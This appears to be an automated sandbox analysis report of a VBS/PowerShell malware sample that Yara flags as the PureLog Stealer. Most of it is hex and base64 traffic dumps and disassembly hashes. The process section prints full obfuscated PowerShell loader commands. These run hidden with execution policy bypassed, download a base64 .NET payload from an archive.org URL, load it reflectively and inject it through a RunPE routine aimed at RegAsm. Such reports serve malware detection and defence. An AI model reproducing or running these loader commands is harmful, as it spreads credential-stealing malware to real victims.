                                                          Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                          Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                          Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                          Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                          Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                          Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                          2024-10-02 03:30:40 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                          Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:23:30:34
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs"
                                                          Imagebase:0x7ff7ae350000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:23:30:35
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:23:30:35
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:23:30:37
                                                          Start date:01/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 00007FFD9B7537B5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1816180929.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ffd9b750000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                            • Instruction ID: a80c8cd11ff045cf1758e7ef6960007ee9c999f62fdb26ee7e32c7126f981996
                                                            • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                            • Instruction Fuzzy Hash: AB01A77020CB0C4FDB48EF0CE051AA6B3E0FB85320F10056DE58AC36A1D632E882CB41

                                                            Executed Functions

                                                            Function 00007FFD9B810644 Relevance: 1.1, Instructions: 1089COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797802283.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b810000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4f8c216c6e71b6ecb5c6e5ddeee722773088d6d8a59883c899db62ced26d42c
                                                            • Instruction ID: 65acf131b584eb9085a4f4df2b0962974db00729729b750ba329752d7b4ba3ee
                                                            • Opcode Fuzzy Hash: c4f8c216c6e71b6ecb5c6e5ddeee722773088d6d8a59883c899db62ced26d42c
                                                            • Instruction Fuzzy Hash: 22623722B1FB8D0FE7A69B684C655B43BE1EF5A710B0A01FFD44DC71A3D919AD068381
                                                            Function 00007FFD9B8103AC Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797802283.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b810000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H$UAVW
                                                            • API String ID: 0-4075652740
                                                            • Opcode ID: 913f5835c7c55b8e19d950314f1b50bbb4e9cee69653cf1b947645947be6802d
                                                            • Instruction ID: b3453d300dd7f213a920dcccd89f666432a2d1349d0153c1a3a914b874635f3f
                                                            • Opcode Fuzzy Hash: 913f5835c7c55b8e19d950314f1b50bbb4e9cee69653cf1b947645947be6802d
                                                            • Instruction Fuzzy Hash: 35916622B1FA8D4FEBA5DBA848646B47BE1EF59614F0901FAE04CD71A3DD28AC05C341
                                                            Function 00007FFD9B743BB7 Relevance: 2.0, Strings: 1, Instructions: 722COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797369691.00007FFD9B740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b740000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a[_H
                                                            • API String ID: 0-2266170898
                                                            • Opcode ID: f58f657b29ee03f31fdb1a6523dad32c31d561ad69dc34dd57c7e10a16735703
                                                            • Instruction ID: 64cc8ae95126c1022e1967b0a3269edf801bdbe7308b7d534732e845f2fbc0ea
                                                            • Opcode Fuzzy Hash: f58f657b29ee03f31fdb1a6523dad32c31d561ad69dc34dd57c7e10a16735703
                                                            • Instruction Fuzzy Hash: A6F1B231B09A4D8FDF94EB5CC455AA977E2FF68311F1542B9D40DC72A6CE24E882CB80
                                                            Function 00007FFD9B817939 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797802283.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b810000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3af30ce52523b86ec61b7c1c5176215a0d519c2377c303f992e1e0c48fecb799
                                                            • Instruction ID: 5c0b21634d4b6830709d098988e584d07085279b84192c224ccde43b0a26b437
                                                            • Opcode Fuzzy Hash: 3af30ce52523b86ec61b7c1c5176215a0d519c2377c303f992e1e0c48fecb799
                                                            • Instruction Fuzzy Hash: E711D656F1FA4E0FE7A5AB6C042467451C2DF98211B5910FAD41CC72EBDD1CED094340
                                                            Function 00007FFD9B8138FE Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797802283.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b810000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab2a7646f7c202ab68638e0cffe89ada38d4fdecd7bbad4f14fd23ec0ca76102
                                                            • Instruction ID: 84691ed25de3807eb3f66e35a3fbb8ffae568e28886f0e6a3b4b8a7c1b983d1c
                                                            • Opcode Fuzzy Hash: ab2a7646f7c202ab68638e0cffe89ada38d4fdecd7bbad4f14fd23ec0ca76102
                                                            • Instruction Fuzzy Hash: C7112C32F0F6894FEB65EF9884A05A8BBD1EF5E310F1500BEC44CC7193DA259841C311
                                                            Function 00007FFD9B7457A5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797369691.00007FFD9B740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b740000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49ec1e809c2d0692ef1d623c3d7f58c7cc09276da2ab81d8e280049d171b4cfc
                                                            • Instruction ID: f193d108f2ee07aa393a6e4b9d500ca74bd1c798a5f74820a3dec17198bd65b2
                                                            • Opcode Fuzzy Hash: 49ec1e809c2d0692ef1d623c3d7f58c7cc09276da2ab81d8e280049d171b4cfc
                                                            • Instruction Fuzzy Hash: 1301A73020CB0C8FDB48EF0CE051ABAB7E0FB95324F10056DE59AC36A1D632E881CB41

                                                            Non-executed Functions

                                                            Function 00007FFD9B749F19 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1797369691.00007FFD9B740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffd9b740000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ae5af9a339d5cdac683128bb2e656dc9a9fb382a9d79a7d26afb2445de1e3b5
                                                            • Instruction ID: 1d9e10c5e370b8f13c2b53b953fce144f5522ca315080e787a57cd261b711cb7
                                                            • Opcode Fuzzy Hash: 6ae5af9a339d5cdac683128bb2e656dc9a9fb382a9d79a7d26afb2445de1e3b5
                                                            • Instruction Fuzzy Hash: 0B511F6284E7C54FE7138B708C765907FB0AF03225B4A46EBC4D4CB0F3E6595A5AC322